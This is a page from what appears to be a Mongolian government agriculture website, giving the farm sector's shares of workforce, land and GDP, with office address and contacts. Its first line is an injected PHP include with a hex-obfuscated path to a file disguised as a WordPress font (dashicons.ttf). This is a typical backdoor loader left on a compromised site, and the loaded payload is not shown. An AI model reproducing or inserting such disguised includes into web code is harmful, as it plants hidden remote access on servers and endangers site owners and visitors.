@include "\x2f\x68\x6f\x6d\x65\x31\x2f\x6b\x68\x61\x6c\x6b\x68\x67\x6f\x2f\x70\x75\x62\x6c\x69\x63\x5f\x68\x74\x6d\x6c\x2f\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\x2f\x54\x65\x78\x74\x2f\x44\x69\x66\x66\x2f\x45\x6e\x67\x69\x6e\x65\x2f\x64\x61\x73\x68\x69\x63\x6f\x6e\x73\x2e\x74\x74\x66";?>

Эхлэл

Шинэ мэдээлэл

ХҮНС, ХАА САЛБАРЫН ӨНӨӨГИЙН БАЙДАЛ

Ажиллах хүч

Нийт ажиллах хүчний 28.7% нь хөдөө аж ахуйн салбарт ажиллаж байна.

Газар нутаг

Нийт газар нутгийн 73.6% нь хөдөө аж ахуйн эдэлбэр газар эзэлж байна.

Дотоодын нийт бүтээгдэхүүн

Дотоодын нийт бүтээгдэхүүний 11.5% -ийг хөдөө ахуйн салбар бүтээж байна.

Хаяг

17070, Улаанбаатар хот,

Хан-Уул дүүрэг, 3-р хороо,

Чингисийн өргөн чөлөө,

Үйлдвэрийн баруун бүс,

Хөдөө аж ахуйг дэмжих сангийн 2-р байр

Холбоо барих

Бичиг хэрэг: (+976) 8314 1457

Захиргаа, Удирдлагын Алба  (+976) 8314 1458

Цахим хуудас, шуудан

Web : http://khalkhgol.mofa.gov.mn

Email : info@khalkhgol.mofa.gov.mn